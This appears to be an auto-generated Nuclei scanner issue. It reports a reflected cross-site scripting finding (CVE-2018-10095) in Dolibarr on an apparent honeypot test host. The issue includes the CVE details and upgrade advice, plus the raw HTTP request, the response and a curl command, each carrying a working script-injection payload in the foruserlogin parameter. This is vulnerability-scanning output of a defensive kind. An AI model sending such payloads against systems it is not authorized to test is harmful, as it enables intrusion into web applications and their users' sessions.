
Dolibarr <7.0.2 - Cross-Site Scripting (CVE-2018-10095) found on honey.scanme.sh #12

Closed mkrs2404 closed 3 months ago

mkrs2404 commented 6 months ago

Details: CVE-2018-10095 matched at honey.scanme.sh

Protocol: HTTP

Full URL: https://honey.scanme.sh/dolibarr/adherents/cartes/carte.php?mode=cardlogin&foruserlogin=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&model=5160&optioncss=print

Timestamp: Tue Apr 30 13:42:05 +0000 UTC 2024

Source: https://cloud.projectdiscovery.io/vuln/6586cbfcd34f10dbba27c85437f584f7

Template Information

| Key | Value |
| --- | --- |
| Name | Dolibarr <7.0.2 - Cross-Site Scripting |
| Authors | pikpikcu |
| Tags | cve2018, cve, xss, dolibarr |
| Severity | medium |
| Description | Dolibarr before 7.0.2 is vulnerable to cross-site scripting and allows remote attackers to inject arbitrary web script or HTML via the foruserlogin parameter to adherents/cartes/carte.php. |
| Remediation | Upgrade to Dolibarr version 7.0.2 or later to mitigate this vulnerability. |
| CVSS-Metrics | CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N |
| CWE-ID | CWE-79 |
| CVE-ID | CVE-2018-10095 |
| CVSS-Score | 6.10 |
| vendor | dolibarr |
| product | dolibarr |

Request

GET /dolibarr/adherents/cartes/carte.php?mode=cardlogin&foruserlogin=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&model=5160&optioncss=print HTTP/1.1
Host: honey.scanme.sh
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.52
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK
Connection: close
Content-Length: 399
Content-Type: text/html
Date: Tue, 30 Apr 2024 13:42:05 GMT

GET /dolibarr/adherents/cartes/carte.php?mode=cardlogin&foruserlogin=</script><script>alert(document.domain)</script>&model=5160&optioncss=print HTTP/1.1
Host: honey.scanme.sh
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.52

CURL command

curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.52' 'https://honey.scanme.sh/dolibarr/adherents/cartes/carte.php?mode=cardlogin&foruserlogin=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&model=5160&optioncss=print'

Generated by Nuclei v3.2.5